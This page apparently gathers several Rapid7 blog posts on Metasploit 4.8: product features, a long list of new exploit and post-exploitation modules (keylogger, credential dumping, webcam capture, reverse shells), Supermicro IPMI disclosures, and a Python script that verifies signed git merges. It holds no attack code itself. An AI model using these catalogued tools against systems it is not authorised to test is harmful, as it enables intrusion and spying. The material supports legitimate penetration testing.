Rapid7 Blog

Product Updates  

Don't Get Blindsided: Better Visibility Into User and Asset Risks with Metasploit 4.8


Not having visibility can be dangerous in many situations. The new Metasploit 4.8 gives you better visibility in four key areas:

- View phishing exposure in the context of the overall user risk
- See which vulnerabilities pose the biggest risk to your organization
- Have all host information at your fingertips when doing a pentest
- Discover the latest risks on your network with new exploits and other modules

See Phishing Exposure as One Factor of User Risk

Users are often a weak link in the security chain, exposing organizations to attacks. This has led to a change in attacker methodology from brute-force, system-based attacks to deception-oriented attacks; phishing in particular has risen sharply in recent years. Many organizations already conduct end-user training but find it challenging to determine how vulnerable their users really are and which users pose the largest risk.

Rapid7 Metasploit Pro measures the effectiveness of security awareness training by running simulated phishing campaigns, and integrates with Rapid7 UserInsight to present this information in the context of a more comprehensive user risk picture, including network access, cloud service usage, and compromised credentials.

What's new – the details:

- UserInsight can now pull phishing information through Metasploit Pro's Remote API
- UserInsight provides an overview of the current status of each user and incorporates the phishing risk into the overall user risk
- Security professionals can see user awareness trending over time

Here is how this helps you:

- Clear picture of user risks: Security analysts get a quick and clear picture of a user's accounts, network activity, cloud services, mobile devices, and now phishing exposure in one place, unifying information normally scattered across systems.
- More effective security program: Tracking the effectiveness of security awareness training means you can adapt it to become more effective over time.

Metasploit Pro is the only phishing simulation solution that integrates with a solution to provide insight into user activity and risk. Unlike alternative penetration testing solutions, Metasploit Pro's social engineering reports provide conversion rates at each step of the campaign funnel: how many people clicked through a phishing email, how many entered a username and password on a fake website, and how many systems were compromised. Only Metasploit provides advice on how to address risk at each step of the social engineering funnel.

While some phishing simulation services can only measure user awareness, Metasploit Pro can also measure the effectiveness of technical controls. If desired, phishing web pages or email attachments can contain exploits that test patch levels, security configurations, and network-based defenses.

Simulated phishing campaigns are exclusive to Metasploit Pro users.

See which vulnerabilities pose the biggest risk to your organization

Vulnerability scanners can determine installed software and its vulnerabilities, but not whether a vulnerability poses a real risk in the context of your network. This is dangerous and wasteful, because IT teams end up having to fix every vulnerability with equal priority.

Vulnerability validation helps you determine whether a vulnerability poses a high risk to your environment. It focuses on vulnerabilities with known public exploits, which provide an easy way into your network, even for less experienced attackers.

Metasploit Pro simplifies and expedites vulnerability validation. It provides a unified, guided interface, the Vulnerability Validation Wizard, that walks you through each step of the process: importing Nexpose data, auto-exploiting vulnerabilities, and sending the validation results back to Nexpose. You can even define exceptions for vulnerabilities that were not successfully exploited.

Nexpose and Metasploit Pro integrate seamlessly to streamline the vulnerability validation workflow. Together they form a closed-loop security risk assessment: find potential vulnerabilities, exploit them, and identify the security flaws that pose a real threat to the network. After vulnerabilities have been validated, the results are returned to Nexpose, where the exploitability of a vulnerability can be used to create reports and prioritize vulnerabilities for remediation.

What's new – the details:

- Metasploit added a Vulnerability Validation Wizard, greatly simplifying the vulnerability validation process.
- Exploited vulnerabilities are now marked in Nexpose with a special icon.
- Nexpose users can create a dynamic asset group containing validated vulnerabilities, making it easy to see how many machines fall into that group and enabling reporting and trending.
- Nexpose users can now filter by exploited vulnerabilities and create top remediations reports that provide clear instructions for the IT teams.
- Vulnerabilities discovered by Metasploit that were not part of the original Nexpose import are marked with a green "New" flag.
- Clear status next to each vulnerability in Metasploit on whether the vulnerability could be exploited.
- Faster and more robust import of vulnerability scans from Nexpose and third-party scanners.

Here is how this helps you:

- Reduced cost: Focusing on prioritized, high-risk vulnerabilities reduces the workload of the remediation team.
- Higher security assurance: Knowing which vulnerabilities pose a high risk and addressing them first reduces the likelihood that an attacker can get in.
- Higher credibility: Provide proof of exploitability to application owners to elevate the remediation discussion to an objective level.

Only Rapid7 offers closed-loop vulnerability validation, returning information about successful validations and vulnerability exceptions to the vulnerability management solution for easy remediation, reporting, and trending. Unlike other solutions, which require a manual XML export and import of vulnerability data, Metasploit Pro can pull existing scan data directly from Nexpose through a supported API.

Closed-loop vulnerability validation is exclusive to Metasploit Pro users.

If you're interested in hearing more about vulnerability validation and seeing a live demo, join our free webcast "Don't Trust, Validate! How to Determine the Real Risk of Your Vulnerabilities."

Have all host information at your fingertips when doing a pentest

While penetration testers are used to bending technology to suit their needs, solving difficult tasks is not an end in itself. Especially in large penetration tests, it can be challenging to manage a lot of data efficiently without losing the overview. These difficulties can quickly cause longer work hours and overdue projects.

Metasploit Pro makes it easier to carry out standard tasks and to manage the vast amount of information collected during a penetration test. This translates directly into time savings and reduced training needs for new staff. For example, Metasploit Pro manages data by tracking active projects, importing results from other sources, and now allowing manual input.

What's new – the details:

- Overhauled usability of the single host view, the most used screen in Metasploit Pro, to provide all important data at a glance.
- The new screen includes counts/stats for services, vulnerabilities, notes, credentials, captured data, file shares, exploit attempts, and matched modules.
- Pentesters can now manually add services, vulnerabilities, credentials, and captured data files they have discovered outside of Metasploit.

Here is how this helps you:

- Reduced cost: Better usability means shorter project times, lower cost, and reduced training needs for new staff.
- Metasploit Pro makes it much easier than Metasploit Framework to handle large penetration tests and bring new staff on board.

The new single host view is available in Metasploit Community, Metasploit Express, and Metasploit Pro.

128 New Modules in Metasploit 4.8.0: Routers, HP Enterprise Software, and Awesome Payloads

First off, we have 128 new modules since 4.7's release back in July (and you get bonus secgeek points if that count makes you a little nervous). That comes in at just about one and a half new modules a day, every day, since July 15. These modules are all over the place, since most of them come in unannounced to be cleaned up and put to work like so many Dickensian orphans. However, some themes did shake out with what we pursued in exploit-land for this release.

We have eight new modules targeting SOHO routers and access points, from Michael Messner, Craig Heffner, Brandon Perry, and Juan Vazquez. SOHO router hacking has been a focus for Metasploit for about a year now, and we're still championing the idea that if you have work-from-home employees, or even high-priority targets like the CFO's laptop, SOHO routers like these should be in scope for your engagement. It's a discussion worth having, and the availability of Metasploit modules can help a penetration tester make his case.

There are 24 new modules that exploit ZDI-disclosed vulnerabilities, 20 of which saw a bunch of work from Juan Vazquez, who I swear doesn't have it in for HP. It just so happens that over half of these ZDI vulns target HP enterprise server software, including StorageWorks, LoadRunner, IMC, and ProCurve Manager. ZDI bugs are great targets for exploit developers, because they represent popular software that you're likely to find in the enterprise, so penetration testers get a lot of mileage out of them.

This release was unique among most in that there are some really neat new payloads: we now have new bind shell and reverse shell payloads in Lua and Node.js from xistence and Joe Vennix, respectively. These go along with our usual bash, VBS, Perl, Python, and assorted other language shells. If your client's IDS/IPS/AV vendor isn't paying attention, these new shell spawners might slip past their tried-and-true defenses. That said, I have to say that the most exciting new payload is a Python implementation of Meterpreter from Spencer McIntyre. This brings more Meterpreter functionality to pretty much any standard Linux build, and it is getting much more active development than our old C-based POSIX Meterpreter.

Oh, yes, and there's good old Windows Meterpreter. We've made huge improvements there, thanks to some phenomenal focused effort from OJ "TheColonial" Reeves. OJ has brought Meterpreter (sometimes kicking and screaming) into the modern era of C development, with a completely revamped build environment (using the free edition of Microsoft Visual Studio 2013) and a continuous integration platform. Along the way, he smashed a huge pile of bugs and annoyances, both internally and externally reported. What this all means to users is that Meterpreter is slightly smaller and *much* more stable now, *and* it's totally amenable to open source C development. The days of having to incorporate every change with the tribal knowledge of James "Egypt" Lee and HD Moore are pretty much over.

For exploit developers, we have a bunch of brand new libraries for use: FireFart's WordPress manipulation API makes WP-specific assessments much easier, and Meatballs' WDSCP protocol library takes advantage of insecure Windows Deployment Services (are there any other kind?) to get a quick foothold in a WDS-imaged enterprise. Meatballs also contributed a handful of new binary templates for use with payload generation, including templates for PowerShell, VBA, MSI installers, and more, all of which complicate Metasploit's relationship with the various anti-virus vendors.

Of course, that's not all, but those are the headline features for Metasploit Framework 4.8.0. We landed over 2,300 commits since mid-July; the summary above and the modules below represent the most visible changes. But with nearly a hundred non-Rapid7 people who got commits into the master repository for Metasploit Framework, it's really pretty impossible to give a complete rundown of every cool new thing that hit; for that, you can start by looking at the last four or five months' worth of blog posts, or even better, peruse the git shortlog (from your nearest git clone, type 'git shortlog 4.7.0...4.8.0').

So, thanks to all the volunteers listed below for all your commits (and commitment!) to our collective open source security product, sorted by commit count, then alphabetically by first name or handle. You guys make Metasploit go.

Meatballs1, FireFart, jiuweigui, Spencer McIntyre, m-1-k-3, several people calling themselves "root" (fix your .gitconfig, guys!), Nathan Einwechter, xistence, Rick Flores, Karn Ganeshen, MrXors, AverageSecurityGuy, Ramon de C Valle, Markus Wulftange, kaospunk, dummys, Bruno Morisson, RageLtMan, mubix, g0tmi1k, darknight007, bcoles, TecR0c, shellster, Charlie Eriksen, Rich Lundeen, Boris, bmerinofe, joernchen of Phenoelit, jgor, jamcut, ZeroChaos, trustedsec, Shelby Spencer, Sean Verity, Patrick Webster, Dhiru Kholia, ddouhine, Davy Douhine, Alexandre Maloteaux, Tyler Krpata, swtornio, Stephen Haywood, Ryan Wincey, Norbert Szetei, Nicholas Davis, kernelsmith, h0ng10, Frederic Basse, Daniele Martini, Brandon Perry, Brandon Knight, Winterspite, Vlatko Kosturjak, violet, tkrpata, Till Maas, scriptjunkie, Sagi Shahar, Ruslaideemin, Rick Flores, rbsec, pyoor, Paul, nmonkee, MosDefAssassin, Matt Andreko, Juushya, Joshua J. Drake, Jon Hart, Jonathan Rudenberg, Joff Thyer, Joe Barrett, Icewall, Henrik Kentsson, ethicalhack3r, Darren Martyn, corelanc0d3er, Borja Merino, Booboule, allfro, and Alexia Cole.

New modules since 4.7.0:

Exploit modules

- Astium Remote Code Execution by xistence exploits OSVDB-88860
- D-Link Devices Unauthenticated Remote Command Execution by juan vazquez and Michael Messner exploits OSVDB-89861
- D-Link Devices Unauthenticated Remote Command Execution by juan vazquez and Michael Messner exploits OSVDB-92698
- D-Link DIR-605L Captcha Handling Buffer Overflow by juan vazquez and Craig Heffner exploits OSVDB-86824
- D-Link Devices UPnP SOAP Command Execution by juan vazquez and Michael Messner exploits OSVDB-94924
- D-Link Devices UPnP SOAP Telnetd Command Execution by juan vazquez and Michael Messner exploits OSVDB-94924
- Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection by Ramon de C Valle exploits CVE-2013-2121
- Linksys WRT110 Remote Command Execution by juan vazquez, Craig Young, and joev exploits CVE-2013-3568
- PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution by juan vazquez and Dave Weinstein exploits ZDI-13-185
- PineApp Mail-SeCure livelog.html Arbitrary Command Execution by juan vazquez and Unknown exploits ZDI-13-184
- PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution by juan vazquez and Dave Weinstein exploits ZDI-13-188
- Raidsonic NAS Devices Unauthenticated Remote Command Execution by juan vazquez and Michael Messner exploits OSVDB-90221
- Sophos Web Protection Appliance sblistpack Arbitrary Command Execution by juan vazquez and Francisco Falcon exploits CVE-2013-4983
- Zabbix 2.0.8 SQL Injection and Remote Code Execution by Jason Kratzer and Lincoln exploits CVE-2013-5743
- Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation by juan vazquez and Francisco Falcon exploits CVE-2013-4984
- VMWare Setuid vmware-mount Unsafe popen(3) by egyp7 and Tavis Ormandy exploits CVE-2013-1662
- HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow by juan vazquez and e6af8de8b1d4b2b6d5ba2610cbf9cd38 exploits ZDI-13-179
- Java storeImageArray() Invalid Array Indexing Vulnerability by sinn3r, juan vazquez, and Unknown exploits CVE-2013-2465
- Nodejs js-yaml load() Code Execution by Neal Poole and joev exploits CVE-2013-4660
- GestioIP Remote Command Execution by bperry
- GLPI install.php Remote Command Execution by Tristan Leiter exploits CVE-2013-5696
- HP System Management Homepage JustGetSNMPQueue Command Injection by sinn3r and Markus Wulftange exploits CVE-2013-3576
- VMware Hyperic HQ Groovy Script-Console Java Execution by Brendan Coles
- ISPConfig Authenticated Arbitrary PHP Code Execution by Brandon Perry exploits CVE-2013-3629
- Moodle Remote Command Execution by Brandon Perry exploits CVE-2013-3630
- NAS4Free Arbitrary Remote Code Execution by Brandon Perry exploits CVE-2013-3631
- OpenMediaVault Cron Remote Command Execution by Brandon Perry exploits CVE-2013-3632
- OpenX Backdoor PHP Code Execution by egyp7 and Unknown exploits CVE-2013-4211
- ProcessMaker Open Source Authenticated PHP Code Execution by Brendan Coles
- Ruby on Rails Known Secret Session Cookie Remote Code Execution by joernchen of Phenoelit
- Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution by sinn3r, juan vazquez, and Takeshi Terada exploits CVE-2013-2251
- vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution by Brandon Perry exploits CVE-2013-3591
- Zabbix Authenticated Remote Command Execution by Brandon Perry exploits CVE-2013-3628
- Mac OS X Persistent Payload Installer by Marcin 'Icewall' Noga and joev
- Mac OS X Sudo Password Bypass by juan vazquez, Todd C. Miller, and joev exploits CVE-2013-1775
- Western Digital Arkeia Remote Code Execution by xistence exploits OSVDB-97615
- ClipBucket Remote Code Execution by Gabby and xistence
- FlashChat Arbitrary File Upload by Brendan Coles and x-hayben21 exploits OSVDB-98233
- Graphite Web Unsafe Pickle Handling by Charlie Eriksen exploits CVE-2013-5093
- Joomla Media Manager File Upload Vulnerability by juan vazquez and Jens Hinrichsen exploits CVE-2013-5576
- Open Flash Chart v2 Arbitrary File Upload by Braeden Thomas, Brendan Coles, Gjoko Krstic, and Halim Cruzito exploits CVE-2009-4140
- OpenEMR 4.1.1 Patch 14 SQLi Privilege Escalation Remote Code Execution by xistence exploits OSVDB-97482
- SPIP connect Parameter PHP Injection by Arnaud Pachot, Davy Douhine, and Frederic Cikala exploits OSVDB-83543
- Squash YAML Code Execution by Charlie Eriksen exploits CVE-2013-5036
- VICIdial Manager Send OS Command Injection by sinn3r, juan vazquez, Adam Caudill, and AverageSecurityGuy exploits CVE-2013-4468
- WebTester 5.x Command Execution by Brendan Coles
- ZeroShell Remote Code Execution by Yann CAM and xistence
- CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow by MC exploits OSVDB-68330
- Apple Quicktime 7 Invalid Atom Length Buffer Overflow by sinn3r, Jason Kratzer, Paul Bates, and Tom Gallagher exploits ZDI-13-110
- HP LoadRunner lrFileIOService ActiveX Remote Code Execution by juan vazquez and rgod exploits ZDI-13-182
- HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution by juan vazquez and Brian Gorenc exploits ZDI-13-207
- Microsoft Internet Explorer SetMouseCapture Use-After-Free by sinn3r and Unknown exploits MS13-080
- Firefox onreadystatechange Event DocumentViewerImpl Use After Free by sinn3r, juan vazquez, Nils, Unknown, and w3bd3vil exploits CVE-2013-1690
- Firefox XMLSerializer Use After Free by juan vazquez and regenrecht exploits ZDI-13-006
- MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free by sinn3r, Jose Antonio Vazquez Gonzalez, Orange Tsai, and Peter Vreugdenhil exploits MS13-055
- MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free by sinn3r and corelanc0d3r exploits MS13-059
- MS13-069 Microsoft Internet Explorer CCaret Use-After-Free by sinn3r and corelanc0d3r exploits MS13-069
- MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free by sinn3r and Unknown exploits MS13-080
- Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution by juan vazquez and rgod exploits OSVDB-93696
- EMC Replication Manager Command Execution by Davy Douhine and Unknown exploits ZDI-11-061
- A-PDF WAV to MP3 v1.0.0 Buffer Overflow by Dr_IDE, d4rk-h4ck3r, and dookie exploits OSVDB-67241
- Beetel Connection Manager NetConfig.ini Buffer Overflow by metacom and wvu exploits OSVDB-98714
- Chasys Draw IES Buffer Overflow by juan vazquez, Christopher Gabriel, Javier 'soez', and Longinos Recuero Bustos exploits CVE-2013-3928
- MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution by juan vazquez and Eduardo Prado exploits MS13-071
- freeFTPd PASS Command Buffer Overflow by TecR0c and Wireghoul exploits OSVDB-96517
- Open-FTPD 1.2 Arbitrary File Upload by Brendan Coles and Serge Gorbunov exploits CVE-2010-2620
- PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow by Christian (Polunchis) Ramirez and Rick (nanotechz9l) Flores exploits OSVDB-94624
- Cogent DataHub HTTP Server Buffer Overflow by juan vazquez and rgod exploits ZDI-13-178
- HP Intelligent Management Center BIMS UploadServlet Directory Traversal by juan vazquez and rgod exploits ZDI-13-238
- HP Managed Printing Administration jobAcct Remote Command Execution by juan vazquez and Andrea Micalizzi exploits ZDI-11-352
- HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload by juan vazquez and rgod exploits ZDI-13-225
- HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload by juan vazquez and rgod exploits ZDI-13-226
- HP SiteScope Remote Code Execution by juan vazquez and rgod exploits ZDI-13-205
- Intrasrv 1.0 Buffer Overflow by PsychoSpy and xis_one exploits OSVDB-94097
- MiniWeb (Build 300) Arbitrary File Upload by AkaStep and Brendan Coles exploits OSVDB-92200
- Oracle Endeca Server Remote Command Execution by juan vazquez and rgod exploits ZDI-13-190
- Ultra Mini HTTPD Stack Buffer Overflow by PsychoSpy and superkojiman exploits CVE-2013-5019
- VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload by juan vazquez and Andrea Micalizzi exploits ZDI-13-147
- Agnitum Outpost Internet Security Local Privilege Escalation by juan vazquez and Ahmad Moghimi exploits OSVDB-96208
- IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL by Ben Campbell
- MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation by Axel Souchet, Ben Campbell, and Tavis Ormandy exploits MS13-005
- Persistent Payload in Windows Volume Shadow Copy by Jedediah Rodriguez
- Windows Management Instrumentation (WMI) Remote Command Execution by Ben Campbell exploits CVE-1999-0504
- Symantec Altiris DS SQL Injection by 3v0lver and Brett Moore exploits ZDI-08-024
- HP Data Protector Cell Request Service Buffer Overflow by juan vazquez and e6af8de8b1d4b2b6d5ba2610cbf9cd38 exploits ZDI-13-130
- HP LoadRunner magentproc.exe Overflow by juan vazquez and Unknown exploits ZDI-13-169
- PowerShell Payload Web Delivery by Ben Campbell and Chris Campbell
- Interactive Graphical SCADA System Remote Command Injection by Luigi Auriemma and MC exploits CVE-2011-1566

Auxiliary and post modules

- HP Intelligent Management SOM Account Creation by juan vazquez and rgod exploits ZDI-13-240
- Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment by Ramon de C Valle exploits CVE-2013-2113
- Nexpose XXE Arbitrary File Read by Bojan Zdrnja, Brandon Perry, and Drazen Popovic
- Openbravo ERP XXE Arbitrary File Read by Brandon Perry exploits CVE-2013-3617
- Sophos Web Protection Appliance patience.cgi Directory Traversal by juan vazquez and Wolfgang Ettlingers exploits CVE-2013-2641
- vBulletin Administrator Account Creation by juan vazquez and Unknown exploits OSVDB-98370
- GE Proficy Cimplicity WebView substitute.bcl Directory Traversal by juan vazquez and Unknown exploits CVE-2013-0653
- SMB File Delete Utility by mubix
- SMB File Download Utility by mubix
- Node.js HTTP Pipelining Denial of Service by Marek Majkowski, joev, and titanous exploits CVE-2013-4450
- Samba read_nttrans_ea_list Integer Overflow by Jeremy Allison and dz_lnly exploits CVE-2013-4124
- HP ProCurve SNAC Domain Controller Credential Dumper by juan vazquez and rgod
- Auxilliary Parser Windows Unattend Passwords by Ben Campbell
- Microsoft Windows Deployment Services Unattend Retrieval by Ben Campbell
- Cisco Ironport Bruteforce Login Utility by Karn Ganeshen
- DLink User-Agent Backdoor Scanner by juan vazquez, Craig Heffner, and Michael Messner
- HP Intelligent Management BIMS DownloadServlet Directory Traversal by juan vazquez and rgod exploits ZDI-13-239
- HP Intelligent Management SOM FileDownloadServlet Arbitrary Download by juan vazquez and rgod exploits ZDI-13-242
- Jenkins Enumeration by Jeff McCutchan
- Host Information Enumeration via NTLM Authentication by Brandon Knight
- Radware AppDirector Bruteforce Login Utility by Karn Ganeshen
- Sentry Switched CDU Bruteforce Login Utility by Karn Ganeshen
- Supermicro Onboard IPMI CGI Vulnerability Scanner by juan vazquez and hdm exploits CVE-2013-3623
- Supermicro Onboard IPMI Static SSL Certificate Scanner by juan vazquez and hdm exploits CVE-2013-3619
- Supermicro Onboard IPMI url_redirect.cgi Authenticated Directory Traversal by juan vazquez and hdm
- SAP Host Agent Information Disclosure by Bruno Morisson exploits CVE-2013-3319
- Gather eCryptfs Metadata by Dhiru Kholia
- CUPS 1.6.1 Root File Read by Jann Horn and joev exploits CVE-2012-5519
- Multi Gather Resolve Hosts by Ben Campbell
- OSX Capture Userspace Keylogger by joev
- OSX Password Prompt Spoof by Joff Thyer and joev
- OSX Manage Record Microphone by joev
- OSX Manage Webcam by joev
- Windows Single Sign On Credential Collector (Mimikatz) by Ben Campbell
- Windows Gather DNS Cache by Borja Merino
- Windows Gather Prefetch File Information by TJ Glad
- Windows Resolve Hosts by Ben Campbell
- Windows Manage Set Port Forwarding With PortProxy by Borja Merino

The new modules are available in all Metasploit editions, including Metasploit Pro, Metasploit Express, Metasploit Community, and Metasploit Framework.

And It's All Available Now

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update


Disclosures for SuperMicro IPMI

On the heels of last week's bundle of FOSS disclosures, we've gone a totally different direction this week with a new round of disclosures. Today, we're concentrating on a single vendor which ships firmware for Baseboard Management Controllers (BMCs): Supermicro, and their Supermicro IPMI firmware. You can read up on the details in HD's blog post, which covers the five new CVEs.

It's important to stress that the vulnerabilities discussed by HD don't actually have much to do with the IPMI subsystems themselves; rather, the focus was on the web and SSH management interfaces. Because of this, there is plenty of opportunity for attackers to leverage these oft-overlooked network services to gain a foothold in your datacenter, especially if you have permissive or non-existent firewall rules that expose these services to the Internet; by default, Supermicro's IPMI web and SSH interfaces listen on TCP/443 and TCP/22, as you'd expect. A simple network misconfiguration, such as a blanket "allow" rule on these ports, can accidentally expose these guys to the Internet. Experience shows that exposing management interfaces to the Internet is surprisingly common, and a quick peek at the Internet courtesy of Project Sonar shows that there are over 35,000 Supermicro IPMI interfaces exposed to the world. Yikes.

We're toiling away on putting together some reliable exploits and scanner modules for the vulnerabilities, so keep an eye on the Metasploit Framework repository for those. And speaking of our open source repo...

Signed Commits for Metasploit Framework

In Metasploit Framework development news, we've started getting serious about cryptographically signing our commits to Metasploit Framework. This was inspired by the most excellent blog post from Mike Gerwitz, A Git Horror Story: Repository Integrity with Signed Commits. At this point, pretty much all merges to Metasploit's master branch are signed with the committer's PGP key, and you can confirm the signatures yourself by this easy and not-so-fun two-step process: First, get hold of all the committer keys and import them with your command line PGP/GPG application. Next, run the command "git log --show-signature --merges", and marvel at the cryptographic integrity of the most recent merges.

For me, the main reason to do something like this is to add a layer of authenticity to our open source project -- by ensuring that commits to master are signed, even if one of our committers' GitHub accounts gets totally compromised, the attacker would still need to also compromise the committer's PGP key in order to reasonably impersonate him. For most sensible people (our committers included), that means compromising the local key store, which is a much smaller attack vector than GitHub. GitHub is great -- seriously, it is -- but it's big, popular, and always online (pretty much), so it's an attractive target for both focused attacks and general vandalism.

Now, actually verifying these signatures automatically by end users is another story; sadly, I don't have any advice for you on how to automatically reject and revert unsigned commits. Today, I eyeball it manually, which, of course, sucks. We've asked GitHub nicely to provide some kind of indicator on their web UI that a commit is signed, so I'm hopeful that that feature is Coming Soon. If you have any advice for nice signature-verifying git functionality, comment below, por favor!

New Modules

We have two new exploits this week: one for ProcessMaker Open Source by longtime contributor Brendan Coles, and one for Beetel Connection Manager. The latter is the very first exploit module from our new hire, William Vu, so feel free to pay special attention to this module, and file lots of annoying bugs for him on our Redmine issue tracker. Thanks guys!

Exploit modules

- ProcessMaker Open Source Authenticated PHP Code Execution by Brendan Coles
- Beetel Connection Manager NetConfig.ini Buffer Overflow by metacom and wvu exploits OSVDB-98714

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Ninja Update: We have just landed three new auxiliary modules for the Supermicro issues that can help in scanning efforts; they'll be in next week's Metasploit update, but those of you who are following our bleeding-edge source can fetch them from GitHub.
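The "Signed Commits" section above stops at eyeballing "git log --show-signature --merges" by hand. The script below is an added example for this post, not code from the Metasploit project: it turns that manual check into a pass/fail policy by asking git for its one-letter signature verdict per merge commit (the %G? placeholder) and flagging every merge that is unsigned, has a bad signature, or cannot be checked because the signer's key was never imported. The sample log lines, SHAs, and key ids embedded in it are constructed, not real Metasploit commits; the rev range 4.7.0..4.8.0 is only the example used above.

```python
"""Policy check for PGP-signed merge commits (added example, not project code).

Consumes the output of a git log format that asks git/gpg for a
per-commit signature verdict, for example:

    git log --merges --format='%H%x09%G?%x09%GK%x09%s' 4.7.0..4.8.0

%G? is git's one-letter verdict: G good, U good but the key's validity is
unknown, X good but expired signature, Y good but expired key, R good but
revoked key, B bad signature, E cannot be checked (key not in keyring),
N no signature. %GK is the signing key id and %s the subject line.
"""
import subprocess
import sys
from dataclasses import dataclass

LOG_FORMAT = "%H%x09%G?%x09%GK%x09%s"

REASONS = {
    "N": "no signature",
    "E": "signature cannot be checked (import the signer's key)",
    "B": "BAD signature",
    "X": "good signature but it has expired",
    "Y": "good signature but the key has expired",
    "R": "good signature but the key is revoked",
    "U": "good signature but key validity is unknown (key not lsign'ed)",
}


@dataclass(frozen=True)
class MergeSig:
    sha: str
    verdict: str
    key_id: str
    subject: str


def parse_log(text: str) -> list:
    """Parse the tab-separated lines produced by LOG_FORMAT."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        sha, verdict, key_id, subject = line.split("\t", 3)
        rows.append(MergeSig(sha, verdict, key_id, subject))
    return rows


def classify(rows, require_trusted: bool = False) -> dict:
    """Return {sha: reason} for every merge that fails the policy.

    With require_trusted=False a 'U' verdict is accepted: that is exactly
    what you see right after importing a committer's key without assigning
    it trust locally. With require_trusted=True only 'G' passes.
    """
    accepted = {"G"} if require_trusted else {"G", "U"}
    problems = {}
    for r in rows:
        if r.verdict in accepted:
            continue
        reason = REASONS.get(r.verdict, "unexpected verdict %r" % r.verdict)
        if r.key_id:
            reason += " [key %s]" % r.key_id
        problems[r.sha] = reason
    return problems


def git_merge_signatures(rev_range: str, repo: str = ".") -> list:
    """Run git against a local clone; gpg must know the committers' keys."""
    out = subprocess.run(
        ["git", "-C", repo, "log", "--merges", "--format=" + LOG_FORMAT, rev_range],
        check=True, capture_output=True, text=True,
    ).stdout
    return parse_log(out)


# Constructed sample output (fake SHAs, key ids and subjects), one merge per line.
SAMPLE_LOG = "\n".join([
    "1" * 40 + "\tG\tAAAAAAAAAAAAAAAA\tMerge pull request #1 from alice/fix",
    "2" * 40 + "\tU\tBBBBBBBBBBBBBBBB\tMerge pull request #2 from bob/feature",
    "3" * 40 + "\tN\t\tMerge pull request #3 from mallory/surprise",
    "4" * 40 + "\tE\tCCCCCCCCCCCCCCCC\tMerge pull request #4 from carol/docs",
    "5" * 40 + "\tB\tDDDDDDDDDDDDDDDD\tMerge pull request #5 from dave/tamper",
]) + "\n"


def main(argv) -> int:
    """Usage: check_merges.py [--strict] [REV_RANGE]; no range runs the sample."""
    strict = "--strict" in argv
    ranges = [a for a in argv[1:] if not a.startswith("--")]
    rows = git_merge_signatures(ranges[0]) if ranges else parse_log(SAMPLE_LOG)
    problems = classify(rows, require_trusted=strict)
    for sha, reason in problems.items():
        print(sha[:12], reason)
    return 1 if problems else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Against the constructed sample the script flags three of five merges (unsigned, key missing, bad signature); with --strict it also flags the merge whose key was imported but never marked trusted, which is the usual state after the "import the committer keys" step. A non-zero exit is what you would wire into a post-fetch hook or CI job to refuse to build from an unsigned master.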

Weekly Update: Exploiting (Kind of) Popular FOSS Apps


Disclosure for FOSS Projects

Earlier today, we published seven modules for newly disclosed vulnerabilities that target seven free and open source (FOSS) projects, all discovered and written by long-time Metasploit contributor Brandon Perry. These vulnerabilities moved through Rapid7's usual disclosure process, and as you can read in the summary blog post, it was a little bit of an adventure. These were not projects like Linux or Apache with bazillions of downloads, installed basically everywhere, but the second and third tier of free software projects, which have merely millions of downloads or tens of thousands of users.

One thing that occurred to me is that these may be the first, or at least among the first, vulnerabilities disclosed to many of these software vendors. Collectively, these applications have been downloaded more than 16 million times, so it seems weird that the vendors' disclosure handling wasn't a little more normalized.

Of course, the way to get good at anything is to practice, so publishers of free software at this level of popularity could use some practice fielding new vulnerability disclosures. To that end, if you're a user of these applications (or other mildly popular applications), you may want to take a look at their openly published source and binaries to see if you can't uncover some vulnerabilities yourself. After all, that's part of the compact we have with FOSS publishers: they make their materials free to open inspection, but someone actually has to do the inspection.

As you can see in the technical writeup, most of these exposures aren't terribly complicated once you start looking. These issues were uncovered and exploited by Brandon primarily during some downtime at DEF CON 2013, so it's not like it took a particularly complicated approach to bug hunting.

Inspecting open source software for security issues is a public good that pretty much anyone with technical chops can get into: you can practice your exploit dev skills, and the software developers can practice handling disclosures once you report them, either directly or through a third party like ZDI or your friends here at Rapid7. There are tons of books and websites on security best practices and vulnerability research to get you started, and lots of helpful researchers on the Internet to help you along the way. All I ask is that you disclose your findings reasonably and give the vendor time to patch and time to warn their user base about the issues. That way, you're not needlessly injecting extra instability into the Internet as a whole.

A Quick Respin of 4.7.2

